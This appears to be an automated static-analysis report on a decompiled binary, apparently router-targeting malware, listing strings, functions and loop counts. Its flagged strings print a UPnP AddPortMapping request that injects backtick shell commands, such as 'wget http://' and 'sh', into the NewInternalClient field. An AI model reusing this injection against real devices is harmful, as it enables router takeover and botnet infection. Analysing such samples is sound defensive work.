=============================================================================
========	BINARY ID :8801b3c4f33ab92332346b7bd0f1005c824a802f==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :148
SUPSCPECTED LINES COUNT :4
SUPSCPECTED STRINGS COUNT (DISTINCT) :7
SUPSCPECTED STRINGS WEIGHT :31
SUSPECT STRING SCORE : [31 / 150] 20%
USER AGENTS STRINGS COUNT :0
STATIC IPs STRINGS COUNT :0
DYNAMIC IPs STRINGS COUNT :0
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 590\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;>c
`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 623\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;wget http://
POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 592\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;sh c
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
================================================================================
========	FUNCTIONS SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES			: 56727
+++TOTAL FUNCTIONS 			:125
+++LINES PER FUNCTION RATIO 	: 453.816
+++SUSPECTED LINES COUNT 	: 191
+++SUSPECTED LINES RATIO 	: 0.336700336700337
================================================================================
========	WHILES SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES				: 56727
+++WHILE (TRUE) LINES			: 3248
+++WHILE (TRUE) LINES RATION		:5.72566855289368%
+++WHILE (TRUE) LOOPS COUNT		: 34
================================================================================
========	SYSTEM FILES SUMMARY : ================================================
================================================================================
                                            function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 590\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;>c");
                                            function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 623\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;wget http://");
                                            function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 592\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;sh c");
    int32_t v397 = function_404bb0("/dev/null"); // 0x4067a4
================================================================================
========	IP PATTERNS SUMMARY : =================================================
================================================================================
                                            function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 590\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;>c");

                                            function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 623\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;wget http://");

                                            function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 592\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;sh c");

================================================================================
========	SYSTEM CALLS SUMMARY : ================================================
================================================================================
================================================================================
========	FUNCTIONS LIST : =======================================================
================================================================================
FUNCTION_NAME                                     |ARGS|LENGH   |SUSPCET_INSTRC|WHILE_INSTRC|
----------------------------------------------------------------------------------------------
function_404464                                   |1   |778     |75            |379         |
----------------------------------------------------------------------------------------------
function_40315c                                   |1   |1078    |16            |548         |
----------------------------------------------------------------------------------------------
function_401eec                                   |2   |833     |15            |331         |
----------------------------------------------------------------------------------------------
function_400624                                   |2   |698     |10            |226         |
----------------------------------------------------------------------------------------------
function_402a7c                                   |2   |1086    |10            |674         |
----------------------------------------------------------------------------------------------
function_407840                                   |3   |710     |6             |22          |
----------------------------------------------------------------------------------------------
function_401078                                   |0   |825     |5             |304         |
----------------------------------------------------------------------------------------------
function_403fe8                                   |1   |483     |2             |80          |
----------------------------------------------------------------------------------------------
function_407b70                                   |1   |489     |2             |74          |
----------------------------------------------------------------------------------------------
function_405aa0                                   |2   |412     |2             |0           |
----------------------------------------------------------------------------------------------
function_4058c0                                   |6   |409     |2             |0           |
----------------------------------------------------------------------------------------------
function_4059a0                                   |6   |409     |2             |0           |
----------------------------------------------------------------------------------------------
function_405940                                   |4   |409     |2             |0           |
----------------------------------------------------------------------------------------------
function_405600                                   |5   |409     |2             |0           |
----------------------------------------------------------------------------------------------
function_405860                                   |4   |409     |2             |0           |
----------------------------------------------------------------------------------------------
function_4046e8                                   |0   |413     |2             |0           |
----------------------------------------------------------------------------------------------
function_400c78                                   |1   |463     |2             |58          |
----------------------------------------------------------------------------------------------
function_400960                                   |0   |489     |2             |61          |
----------------------------------------------------------------------------------------------
function_400dc0                                   |1   |465     |2             |61          |
----------------------------------------------------------------------------------------------
function_4073c0                                   |4   |424     |1             |0           |
----------------------------------------------------------------------------------------------
function_400f0c                                   |1   |417     |1             |15          |
----------------------------------------------------------------------------------------------
function_4049d0                                   |1   |410     |1             |0           |
----------------------------------------------------------------------------------------------
function_406868                                   |7   |738     |1             |18          |
----------------------------------------------------------------------------------------------
function_4003b8                                   |4   |430     |1             |19          |
----------------------------------------------------------------------------------------------
function_404b50                                   |2   |410     |1             |0           |
----------------------------------------------------------------------------------------------
function_406ed0                                   |0   |455     |1             |38          |
----------------------------------------------------------------------------------------------
function_4045d0                                   |3   |447     |1             |46          |
----------------------------------------------------------------------------------------------
function_407100                                   |0   |410     |1             |0           |
----------------------------------------------------------------------------------------------
function_4070a0                                   |0   |410     |1             |0           |
----------------------------------------------------------------------------------------------
function_4060d0                                   |2   |450     |1             |38          |
----------------------------------------------------------------------------------------------
function_404a30                                   |0   |410     |1             |0           |
----------------------------------------------------------------------------------------------
function_4056c0                                   |4   |410     |1             |0           |
----------------------------------------------------------------------------------------------
function_407700                                   |3   |655     |1             |91          |
----------------------------------------------------------------------------------------------
function_400420                                   |6   |456     |1             |23          |
----------------------------------------------------------------------------------------------
function_405780                                   |5   |409     |1             |0           |
----------------------------------------------------------------------------------------------
function_404a90                                   |0   |410     |1             |0           |
----------------------------------------------------------------------------------------------
function_405800                                   |3   |409     |1             |0           |
----------------------------------------------------------------------------------------------
function_405390                                   |1   |439     |1             |31          |
----------------------------------------------------------------------------------------------
function_405a20                                   |5   |409     |1             |0           |
----------------------------------------------------------------------------------------------
function_404404                                   |4   |436     |1             |28          |
----------------------------------------------------------------------------------------------
function_407160                                   |0   |410     |1             |0           |
----------------------------------------------------------------------------------------------
function_405660                                   |5   |409     |1             |0           |
----------------------------------------------------------------------------------------------
function_404314                                   |3   |444     |1             |16          |
----------------------------------------------------------------------------------------------
function_4071c0                                   |0   |410     |1             |0           |
----------------------------------------------------------------------------------------------
function_4047d0                                   |2   |457     |1             |44          |
----------------------------------------------------------------------------------------------
function_400584                                   |3   |429     |1             |23          |
----------------------------------------------------------------------------------------------
function_405720                                   |4   |410     |1             |0           |
----------------------------------------------------------------------------------------------
function_404af0                                   |0   |410     |1             |0           |
----------------------------------------------------------------------------------------------
function_404bb0                                   |1   |416     |1             |0           |
----------------------------------------------------------------------------------------------
function_4042e8                                   |3   |416     |0             |0           |
----------------------------------------------------------------------------------------------
function_403fc8                                   |0   |399     |0             |0           |
----------------------------------------------------------------------------------------------
function_404c2c                                   |1   |399     |0             |0           |
----------------------------------------------------------------------------------------------
function_404200                                   |1   |400     |0             |0           |
----------------------------------------------------------------------------------------------
function_404204                                   |0   |409     |0             |0           |
----------------------------------------------------------------------------------------------
entry_point                                       |1   |401     |0             |0           |
----------------------------------------------------------------------------------------------
function_404900                                   |0   |410     |0             |0           |
----------------------------------------------------------------------------------------------
function_400898                                   |2   |399     |0             |0           |
----------------------------------------------------------------------------------------------
function_404224                                   |2   |420     |0             |0           |
----------------------------------------------------------------------------------------------
function_405000                                   |1   |410     |0             |0           |
----------------------------------------------------------------------------------------------
function_4055b0                                   |1   |406     |0             |0           |
----------------------------------------------------------------------------------------------
function_4075e0                                   |2   |401     |0             |0           |
----------------------------------------------------------------------------------------------
function_4061d8                                   |3   |514     |0             |0           |
----------------------------------------------------------------------------------------------
function_400900                                   |0   |399     |0             |0           |
----------------------------------------------------------------------------------------------
function_400328                                   |5   |432     |0             |0           |
----------------------------------------------------------------------------------------------
function_406350                                   |1   |419     |0             |0           |
----------------------------------------------------------------------------------------------
function_404c50                                   |2   |412     |0             |0           |
----------------------------------------------------------------------------------------------
unknown_0                                         |0   |0       |0             |0           |
----------------------------------------------------------------------------------------------
function_4061bc                                   |3   |406     |0             |0           |
----------------------------------------------------------------------------------------------
function_402fa4                                   |1   |431     |0             |0           |
----------------------------------------------------------------------------------------------
function_40425c                                   |0   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_407ec0                                   |1   |418     |0             |0           |
----------------------------------------------------------------------------------------------
function_406680                                   |0   |428     |0             |0           |
----------------------------------------------------------------------------------------------
function_404e60                                   |3   |409     |0             |0           |
----------------------------------------------------------------------------------------------
function_4002d0                                   |2   |423     |0             |0           |
----------------------------------------------------------------------------------------------
function_406bd0                                   |3   |418     |0             |0           |
----------------------------------------------------------------------------------------------
function_407330                                   |1   |450     |0             |0           |
----------------------------------------------------------------------------------------------
function_406cc0                                   |5   |409     |0             |0           |
----------------------------------------------------------------------------------------------
function_407e20                                   |1   |399     |0             |0           |
----------------------------------------------------------------------------------------------
function_40674c                                   |2   |400     |0             |0           |
----------------------------------------------------------------------------------------------
function_404da0                                   |3   |410     |0             |0           |
----------------------------------------------------------------------------------------------
function_405c00                                   |2   |400     |0             |0           |
----------------------------------------------------------------------------------------------
function_405c54                                   |2   |401     |0             |0           |
----------------------------------------------------------------------------------------------
function_406440                                   |1   |483     |0             |0           |
----------------------------------------------------------------------------------------------
function_4051f0                                   |0   |488     |0             |0           |
----------------------------------------------------------------------------------------------
function_4054b0                                   |0   |401     |0             |0           |
----------------------------------------------------------------------------------------------
function_401c4c                                   |0   |495     |0             |0           |
----------------------------------------------------------------------------------------------
function_404284                                   |2   |410     |0             |0           |
----------------------------------------------------------------------------------------------
function_404fa0                                   |1   |410     |0             |0           |
----------------------------------------------------------------------------------------------
function_407220                                   |3   |404     |0             |0           |
----------------------------------------------------------------------------------------------
function_405c90                                   |1   |483     |0             |0           |
----------------------------------------------------------------------------------------------
function_405490                                   |0   |399     |0             |0           |
----------------------------------------------------------------------------------------------
function_404688                                   |0   |399     |0             |0           |
----------------------------------------------------------------------------------------------
function_404258                                   |0   |400     |0             |0           |
----------------------------------------------------------------------------------------------
function_402918                                   |2   |412     |0             |0           |
----------------------------------------------------------------------------------------------
function_406d20                                   |1   |400     |0             |0           |
----------------------------------------------------------------------------------------------
function_4074c0                                   |2   |401     |0             |0           |
----------------------------------------------------------------------------------------------
function_404870                                   |0   |419     |0             |0           |
----------------------------------------------------------------------------------------------
function_404ee0                                   |0   |410     |0             |0           |
----------------------------------------------------------------------------------------------
function_4072d0                                   |4   |409     |0             |0           |
----------------------------------------------------------------------------------------------
function_406d70                                   |2   |417     |0             |0           |
----------------------------------------------------------------------------------------------
function_405f40                                   |1   |469     |0             |0           |
----------------------------------------------------------------------------------------------
function_405b00                                   |2   |482     |0             |0           |
----------------------------------------------------------------------------------------------
function_4028bc                                   |0   |405     |0             |0           |
----------------------------------------------------------------------------------------------
function_404e00                                   |4   |409     |0             |0           |
----------------------------------------------------------------------------------------------
function_400f68                                   |0   |399     |0             |0           |
----------------------------------------------------------------------------------------------
function_405520                                   |3   |530     |0             |0           |
----------------------------------------------------------------------------------------------
function_406754                                   |2   |413     |0             |0           |
----------------------------------------------------------------------------------------------
function_404f40                                   |2   |410     |0             |0           |
----------------------------------------------------------------------------------------------
function_406190                                   |4   |411     |0             |0           |
----------------------------------------------------------------------------------------------
function_405c28                                   |2   |401     |0             |0           |
----------------------------------------------------------------------------------------------
function_4050c0                                   |1   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_4029cc                                   |0   |400     |0             |0           |
----------------------------------------------------------------------------------------------
function_406e00                                   |3   |427     |0             |0           |
----------------------------------------------------------------------------------------------
function_404970                                   |1   |410     |0             |0           |
----------------------------------------------------------------------------------------------
function_407460                                   |2   |410     |0             |0           |
----------------------------------------------------------------------------------------------
function_405060                                   |3   |410     |0             |0           |
----------------------------------------------------------------------------------------------
function_404cd0                                   |4   |428     |0             |0           |
----------------------------------------------------------------------------------------------
function_4067dc                                   |0   |420     |0             |0           |
----------------------------------------------------------------------------------------------
function_407e50                                   |1   |406     |0             |0           |
----------------------------------------------------------------------------------------------
function_405e80                                   |2   |441     |0             |0           |
----------------------------------------------------------------------------------------------
function_407c70                                   |0   |578     |0             |0           |
----------------------------------------------------------------------------------------------
function_407f80                                   |0   |402     |0             |0           |
----------------------------------------------------------------------------------------------
function_407fe4                                   |0   |400     |0             |0           |
----------------------------------------------------------------------------------------------
function_400fc4                                   |3   |401     |0             |0           |
----------------------------------------------------------------------------------------------
function_406744                                   |1   |399     |0             |0           |
----------------------------------------------------------------------------------------------
================================================================================
========	FUNCTIONS SUSPECTED INSTRUNCTIONS : ===================================
================================================================================
=================FUNCTION : function_404464 ===================
++++++++ FUNCTION START 17627
++++++++ FUNCTION END 18405
++++++++ FUNCTION LENGTH 778
    while (true) {
            case 32: {
                while (true) {
                        case 32: {
                            while (true) {
                                    case 32: {
                                        while (true) {
                                                case 32: {
                                                    while (true) {
                                                            case 32: {
                                                                while (true) {
                                                                        case 32: {
                                                                            while (true) {
                                                                                    case 32: {
                                                                                        while (true) {
                                                                                                case 32: {
                                                                                                    while (true) {
                                                                                                            case 32: {
                                                                                                                while (true) {
                                                                                                                        case 32: {
                                                                                                                            while (true) {
                                                                                                                                    case 32: {
                                                                                                                                        while (true) {
                                                                                                                                                case 32: {
                                                                                                                                                    while (true) {
                                                                                                                                                            case 32: {
                                                                                                                                                                while (true) {
                                                                                                                                                                        case 32: {
                                                                                                                                                                            while (true) {
                                                                                                                                                                                    case 32: {
                                                                                                                                                                                        while (true) {
                                                                                                                                                                                                case 32: {
                                                                                                                                                                                                    while (true) {
                                                                                                                                                                                                            case 32: {
                                                                                                                                                                                                                while (true) {
                                                                                                                                                                                                                        case 32: {
                                                                                                                                                                                                                            while (true) {
                                                                                                                                                                                                                                    case 32: {
                                                                                                                                                                                                                                        while (true) {
                                                                                                                                                                                                                                                case 32: {
                                                                                                                                                                                                                                                    while (true) {
                                                                                                                                                                                                                                                            case 32: {
                                                                                                                                                                                                                                                                while (true) {
                                                                                                                                                                                                                                                                        case 32: {
                                                                                                                                                                                                                                                                            while (true) {
                                                                                                                                                                                                                                                                                    case 32: {
                                                                                                                                                                                                                                                                                        while (true) {
                                                                                                                                                                                                                                                                                                case 32: {
                                                                                                                                                                                                                                                                                                    while (true) {
                                                                                                                                                                                                                                                                                                            case 32: {
                                                                                                                                                                                                                                                                                                            case 9: {
                                                                                                                                                                                                                                                                                                case 9: {
                                                                                                                                                                                                                                                                                    case 9: {
                                                                                                                                                                                                                                                                        case 9: {
                                                                                                                                                                                                                                                            case 9: {
                                                                                                                                                                                                                                                case 9: {
                                                                                                                                                                                                                                    case 9: {
                                                                                                                                                                                                                        case 9: {
                                                                                                                                                                                                            case 9: {
                                                                                                                                                                                                case 9: {
                                                                                                                                                                                    case 9: {
                                                                                                                                                                        case 9: {
                                                                                                                                                            case 9: {
                                                                                                                                                case 9: {
                                                                                                                                    case 9: {
                                                                                                                        case 9: {
                                                                                                            case 9: {
                                                                                                case 9: {
                                                                                    case 9: {
                                                                        case 9: {
                                                            case 9: {
                                                case 9: {
                                    case 9: {
                        case 9: {
            case 9: {
=================FUNCTION : function_40315c ===================
++++++++ FUNCTION START 11881
++++++++ FUNCTION END 12959
++++++++ FUNCTION LENGTH 1078
            while (true) {
                        while (true) {
                        while (true) {
                    while (true) {
                        while (true) {
                        while (true) {
                                            function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 590\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;>c");
                                            function_404224((char *)&v420, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
                                            function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 623\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;wget http://");
                                            function_404224((char *)&v420, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
                                            function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 592\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;sh c");
                                            function_404224((char *)&v420, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
        while (true) {
                while (true) {
            while (true) {
                while (true) {
=================FUNCTION : function_401eec ===================
++++++++ FUNCTION START 8296
++++++++ FUNCTION END 9129
++++++++ FUNCTION LENGTH 833
    while (true) {
        while (true) {
            while (true) {
            while (true) {
                    function_4056c0(v444, (struct sockaddr *)&v442, 16);
                        case 263: {
                            while (true) {
                        case 0: {
                            while (true) {
                                            case 11: {
                                                while (true) {
                                            case 4: {
                                case 11: {
                                    while (true) {
                                case 4: {
=================FUNCTION : function_400624 ===================
++++++++ FUNCTION START 2813
++++++++ FUNCTION END 3511
++++++++ FUNCTION LENGTH 698
                        while (true) {
                                while (true) {
                while (true) {
                    while (true) {
            while (true) {
                while (true) {
        while (true) {
            while (true) {
    while (true) {
        while (true) {
=================FUNCTION : function_402a7c ===================
++++++++ FUNCTION START 10358
++++++++ FUNCTION END 11444
++++++++ FUNCTION LENGTH 1086
    while (true) {
            while (true) {
                    if (function_4056c0(v446, (struct sockaddr *)&v420, 16) != a1) {
                                                    while (true) {
                                                    while (true) {
                                        while (true) {
                                    while (true) {
        if (function_4056c0(v446, (struct sockaddr *)&v420, 16) != a1) {
                                        while (true) {
                                while (true) {
=================FUNCTION : function_407840 ===================
++++++++ FUNCTION START 52855
++++++++ FUNCTION END 53565
++++++++ FUNCTION LENGTH 710
                    case -2: {
                    case -1: {
                        while (true) {
                case -2: {
                case -1: {
                    while (true) {
=================FUNCTION : function_401078 ===================
++++++++ FUNCTION START 6970
++++++++ FUNCTION END 7795
++++++++ FUNCTION LENGTH 825
        while (true) {
    while (true) {
    while (true) {
        while (true) {
                            while (true) {
=================FUNCTION : function_403fe8 ===================
++++++++ FUNCTION START 13364
++++++++ FUNCTION END 13847
++++++++ FUNCTION LENGTH 483
    while (true) {
        while (true) {
=================FUNCTION : function_407b70 ===================
++++++++ FUNCTION START 53568
++++++++ FUNCTION END 54057
++++++++ FUNCTION LENGTH 489
    while (true) {
        while (true) {
=================FUNCTION : function_405aa0 ===================
++++++++ FUNCTION START 36051
++++++++ FUNCTION END 36463
++++++++ FUNCTION LENGTH 412
    int32_t sock_fd = socket(domain, type, protocol); // 0x405ac0
        result = sock_fd;
=================FUNCTION : function_4058c0 ===================
++++++++ FUNCTION START 34403
++++++++ FUNCTION END 34812
++++++++ FUNCTION LENGTH 409
    int32_t v397 = recvfrom(sock, buf, length, flags, NULL, NULL); // 0x405900
    if (flags != 0) {
=================FUNCTION : function_4059a0 ===================
++++++++ FUNCTION START 35227
++++++++ FUNCTION END 35636
++++++++ FUNCTION LENGTH 409
    int32_t v397 = sendto(sock, message, length, flags, NULL, 0); // 0x4059e0
    if (flags != 0) {
=================FUNCTION : function_405940 ===================
++++++++ FUNCTION START 34815
++++++++ FUNCTION END 35224
++++++++ FUNCTION LENGTH 409
    int32_t v397 = send(sock, buf, length, flags); // 0x405960
    if (flags != 0) {
=================FUNCTION : function_405600 ===================
++++++++ FUNCTION START 31517
++++++++ FUNCTION END 31926
++++++++ FUNCTION LENGTH 409
    int32_t accepted_sock_fd = accept(sock, addr, (int32_t *)addr_len); // 0x405620
        result = accepted_sock_fd;
=================FUNCTION : function_405860 ===================
++++++++ FUNCTION START 33991
++++++++ FUNCTION END 34400
++++++++ FUNCTION LENGTH 409
    int32_t v397 = recv(sock, buf, length, flags); // 0x405880
    if (flags != 0) {
=================FUNCTION : function_4046e8 ===================
++++++++ FUNCTION START 19260
++++++++ FUNCTION END 19673
++++++++ FUNCTION LENGTH 413
        function_4056c0(v398, (struct sockaddr *)&v399, 16);
        function_405720(v398, (struct sockaddr *)&v399, (int32_t)&v397);
=================FUNCTION : function_400c78 ===================
++++++++ FUNCTION START 4810
++++++++ FUNCTION END 5273
++++++++ FUNCTION LENGTH 463
    while (true) {
                while (true) {
=================FUNCTION : function_400960 ===================
++++++++ FUNCTION START 4318
++++++++ FUNCTION END 4807
++++++++ FUNCTION LENGTH 489
    while (true) {
    while (true) {
=================FUNCTION : function_400dc0 ===================
++++++++ FUNCTION START 5276
++++++++ FUNCTION END 5741
++++++++ FUNCTION LENGTH 465
    while (true) {
                while (true) {
=================FUNCTION : function_4073c0 ===================
++++++++ FUNCTION START 50549
++++++++ FUNCTION END 50973
++++++++ FUNCTION LENGTH 424
    int32_t v397 = sigprocmask(how, set, (struct _TYPEDEF_sigset_t *)oset); // 0x407418
=================FUNCTION : function_400f0c ===================
++++++++ FUNCTION START 5744
++++++++ FUNCTION END 6161
++++++++ FUNCTION LENGTH 417
    while (true) {
=================FUNCTION : function_4049d0 ===================
++++++++ FUNCTION START 21384
++++++++ FUNCTION END 21794
++++++++ FUNCTION LENGTH 410
    int32_t v397 = close(fd); // 0x4049f0
=================FUNCTION : function_406868 ===================
++++++++ FUNCTION START 44340
++++++++ FUNCTION END 45078
++++++++ FUNCTION LENGTH 738
    while (true) {
=================FUNCTION : function_4003b8 ===================
++++++++ FUNCTION START 1489
